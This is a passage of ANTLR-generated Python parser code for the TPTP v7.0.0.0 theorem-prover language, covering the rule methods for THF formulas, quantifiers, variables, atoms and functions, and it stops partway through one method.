return self.getToken(tptp_v7_0_0_0Parser.Lower_word, 0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_formula_role
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFormula_role" ):
listener.enterFormula_role(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFormula_role" ):
listener.exitFormula_role(self)
def formula_role(self):
localctx = tptp_v7_0_0_0Parser.Formula_roleContext(self, self._ctx, self.state)
self.enterRule(localctx, 24, self.RULE_formula_role)
try:
self.enterOuterAlt(localctx, 1)
self.state = 507
self.match(tptp_v7_0_0_0Parser.Lower_word)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,0)
def thf_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_formula" ):
listener.enterThf_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_formula" ):
listener.exitThf_formula(self)
def thf_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 26, self.RULE_thf_formula)
try:
self.state = 511
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,11,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 509
self.thf_logic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 510
self.thf_sequent()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_logic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_binary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_binary_formulaContext,0)
def thf_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,0)
def thf_type_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_type_formulaContext,0)
def thf_subtype(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_subtypeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_logic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_logic_formula" ):
listener.enterThf_logic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_logic_formula" ):
listener.exitThf_logic_formula(self)
def thf_logic_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_logic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 28, self.RULE_thf_logic_formula)
try:
self.state = 517
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,12,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 513
self.thf_binary_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 514
self.thf_unitary_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 515
self.thf_type_formula()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 516
self.thf_subtype()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_binary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_binary_pair(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_binary_pairContext,0)
def thf_binary_tuple(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_binary_tupleContext,0)
def thf_binary_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_binary_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_binary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_binary_formula" ):
listener.enterThf_binary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_binary_formula" ):
listener.exitThf_binary_formula(self)
def thf_binary_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_binary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 30, self.RULE_thf_binary_formula)
try:
self.state = 522
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,13,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 519
self.thf_binary_pair()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 520
self.thf_binary_tuple()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 521
self.thf_binary_type()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_binary_pairContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,i)
def thf_pair_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_pair_connectiveContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_binary_pair
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_binary_pair" ):
listener.enterThf_binary_pair(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_binary_pair" ):
listener.exitThf_binary_pair(self)
def thf_binary_pair(self):
localctx = tptp_v7_0_0_0Parser.Thf_binary_pairContext(self, self._ctx, self.state)
self.enterRule(localctx, 32, self.RULE_thf_binary_pair)
try:
self.enterOuterAlt(localctx, 1)
self.state = 524
self.thf_unitary_formula()
self.state = 525
self.thf_pair_connective()
self.state = 526
self.thf_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_binary_tupleContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_or_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_or_formulaContext,0)
def thf_and_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_and_formulaContext,0)
def thf_apply_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_apply_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_binary_tuple
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_binary_tuple" ):
listener.enterThf_binary_tuple(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_binary_tuple" ):
listener.exitThf_binary_tuple(self)
def thf_binary_tuple(self):
localctx = tptp_v7_0_0_0Parser.Thf_binary_tupleContext(self, self._ctx, self.state)
self.enterRule(localctx, 34, self.RULE_thf_binary_tuple)
try:
self.state = 531
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,14,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 528
self.thf_or_formula(0)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 529
self.thf_and_formula(0)
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 530
self.thf_apply_formula(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_or_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,i)
def Or(self):
return self.getToken(tptp_v7_0_0_0Parser.Or, 0)
def thf_or_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_or_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_or_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_or_formula" ):
listener.enterThf_or_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_or_formula" ):
listener.exitThf_or_formula(self)
def thf_or_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Thf_or_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 36
self.enterRecursionRule(localctx, 36, self.RULE_thf_or_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 534
self.thf_unitary_formula()
self.state = 535
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 536
self.thf_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 543
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,15,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Thf_or_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_thf_or_formula)
self.state = 538
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 539
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 540
self.thf_unitary_formula()
self.state = 545
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,15,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Thf_and_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,i)
def And(self):
return self.getToken(tptp_v7_0_0_0Parser.And, 0)
def thf_and_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_and_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_and_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_and_formula" ):
listener.enterThf_and_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_and_formula" ):
listener.exitThf_and_formula(self)
def thf_and_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Thf_and_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 38
self.enterRecursionRule(localctx, 38, self.RULE_thf_and_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 547
self.thf_unitary_formula()
self.state = 548
self.match(tptp_v7_0_0_0Parser.And)
self.state = 549
self.thf_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 556
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,16,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Thf_and_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_thf_and_formula)
self.state = 551
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 552
self.match(tptp_v7_0_0_0Parser.And)
self.state = 553
self.thf_unitary_formula()
self.state = 558
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,16,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Thf_apply_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,i)
def App(self):
return self.getToken(tptp_v7_0_0_0Parser.App, 0)
def thf_apply_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_apply_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_apply_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_apply_formula" ):
listener.enterThf_apply_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_apply_formula" ):
listener.exitThf_apply_formula(self)
def thf_apply_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Thf_apply_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 40
self.enterRecursionRule(localctx, 40, self.RULE_thf_apply_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 560
self.thf_unitary_formula()
self.state = 561
self.match(tptp_v7_0_0_0Parser.App)
self.state = 562
self.thf_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 569
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,17,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Thf_apply_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_thf_apply_formula)
self.state = 564
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 565
self.match(tptp_v7_0_0_0Parser.App)
self.state = 566
self.thf_unitary_formula()
self.state = 571
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,17,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Thf_unitary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_quantified_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_quantified_formulaContext,0)
def thf_unary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unary_formulaContext,0)
def thf_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_atomContext,0)
def thf_conditional(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_conditionalContext,0)
def thf_let(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_letContext,0)
def thf_tuple(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_tupleContext,0)
def thf_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_unitary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_unitary_formula" ):
listener.enterThf_unitary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_unitary_formula" ):
listener.exitThf_unitary_formula(self)
def thf_unitary_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_unitary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 42, self.RULE_thf_unitary_formula)
try:
self.state = 582
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,18,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 572
self.thf_quantified_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 573
self.thf_unary_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 574
self.thf_atom()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 575
self.thf_conditional()
pass
elif la_ == 5:
self.enterOuterAlt(localctx, 5)
self.state = 576
self.thf_let()
pass
elif la_ == 6:
self.enterOuterAlt(localctx, 6)
self.state = 577
self.thf_tuple()
pass
elif la_ == 7:
self.enterOuterAlt(localctx, 7)
self.state = 578
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 579
self.thf_logic_formula()
self.state = 580
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_quantified_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_quantification(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_quantificationContext,0)
def thf_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_quantified_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_quantified_formula" ):
listener.enterThf_quantified_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_quantified_formula" ):
listener.exitThf_quantified_formula(self)
def thf_quantified_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_quantified_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 44, self.RULE_thf_quantified_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 584
self.thf_quantification()
self.state = 585
self.thf_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_quantificationContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_quantifier(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_quantifierContext,0)
def thf_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_variable_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_quantification
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_quantification" ):
listener.enterThf_quantification(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_quantification" ):
listener.exitThf_quantification(self)
def thf_quantification(self):
localctx = tptp_v7_0_0_0Parser.Thf_quantificationContext(self, self._ctx, self.state)
self.enterRule(localctx, 46, self.RULE_thf_quantification)
try:
self.enterOuterAlt(localctx, 1)
self.state = 587
self.thf_quantifier()
self.state = 588
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 589
self.thf_variable_list()
self.state = 590
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 591
self.match(tptp_v7_0_0_0Parser.T__13)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_variable_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_variable(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_variableContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_variableContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_variable_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_variable_list" ):
listener.enterThf_variable_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_variable_list" ):
listener.exitThf_variable_list(self)
def thf_variable_list(self):
localctx = tptp_v7_0_0_0Parser.Thf_variable_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 48, self.RULE_thf_variable_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 593
self.thf_variable()
self.state = 598
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 594
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 595
self.thf_variable()
self.state = 600
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_variableContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_typed_variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_typed_variableContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_variable
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_variable" ):
listener.enterThf_variable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_variable" ):
listener.exitThf_variable(self)
def thf_variable(self):
localctx = tptp_v7_0_0_0Parser.Thf_variableContext(self, self._ctx, self.state)
self.enterRule(localctx, 50, self.RULE_thf_variable)
try:
self.state = 603
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,20,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 601
self.thf_typed_variable()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 602
self.variable()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_typed_variableContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def thf_top_level_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_top_level_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_typed_variable
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_typed_variable" ):
listener.enterThf_typed_variable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_typed_variable" ):
listener.exitThf_typed_variable(self)
def thf_typed_variable(self):
localctx = tptp_v7_0_0_0Parser.Thf_typed_variableContext(self, self._ctx, self.state)
self.enterRule(localctx, 52, self.RULE_thf_typed_variable)
try:
self.enterOuterAlt(localctx, 1)
self.state = 605
self.variable()
self.state = 606
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 607
self.thf_top_level_type()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_unary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unary_connectiveContext,0)
def thf_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_unary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_unary_formula" ):
listener.enterThf_unary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_unary_formula" ):
listener.exitThf_unary_formula(self)
def thf_unary_formula(self):
localctx = tptp_v7_0_0_0Parser.Thf_unary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 54, self.RULE_thf_unary_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 609
self.thf_unary_connective()
self.state = 610
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 611
self.thf_logic_formula()
self.state = 612
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_atomContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_function(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_functionContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def defined_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_termContext,0)
def thf_conn_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_conn_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_atom
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_atom" ):
listener.enterThf_atom(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_atom" ):
listener.exitThf_atom(self)
def thf_atom(self):
localctx = tptp_v7_0_0_0Parser.Thf_atomContext(self, self._ctx, self.state)
self.enterRule(localctx, 56, self.RULE_thf_atom)
try:
self.state = 618
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 614
self.thf_function()
pass
elif token in [tptp_v7_0_0_0Parser.Upper_word]:
self.enterOuterAlt(localctx, 2)
self.state = 615
self.variable()
pass
elif token in [tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 3)
self.state = 616
self.defined_term()
pass
elif token in [tptp_v7_0_0_0Parser.Or, tptp_v7_0_0_0Parser.And, tptp_v7_0_0_0Parser.Iff, tptp_v7_0_0_0Parser.Impl, tptp_v7_0_0_0Parser.If, tptp_v7_0_0_0Parser.Niff, tptp_v7_0_0_0Parser.Nor, tptp_v7_0_0_0Parser.Nand, tptp_v7_0_0_0Parser.Not, tptp_v7_0_0_0Parser.ForallComb, tptp_v7_0_0_0Parser.Infix_inequality, tptp_v7_0_0_0Parser.Infix_equality, tptp_v7_0_0_0Parser.ExistsComb, tptp_v7_0_0_0Parser.ChoiceComb, tptp_v7_0_0_0Parser.DescriptionComb, tptp_v7_0_0_0Parser.EqComb, tptp_v7_0_0_0Parser.Assignment]:
self.enterOuterAlt(localctx, 4)
self.state = 617
self.thf_conn_term()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_functionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AtomContext,0)
def functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.FunctorContext,0)
def thf_arguments(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_argumentsContext,0)
def defined_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_functorContext,0)
def system_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.System_functorContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_function
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_function" ):
listener.enterThf_function(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_function" ):
listener.exitThf_function(self)
def thf_function(self):
localctx = tptp_v7_0_0_0Parser.Thf_functionContext(self, self._ctx, self.state)
self.enterRule(localctx, 58, self.RULE_thf_function)
try:
self.state = 636
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,22,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 620
self.atom()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 621
self.functor()
self.state = 622
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 623
self.thf_arguments()
self.state = 624
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 626
self.defined_functor()
self.state = 627
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 628
self.thf_arguments()
self.state = 629
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif la_ == 4:
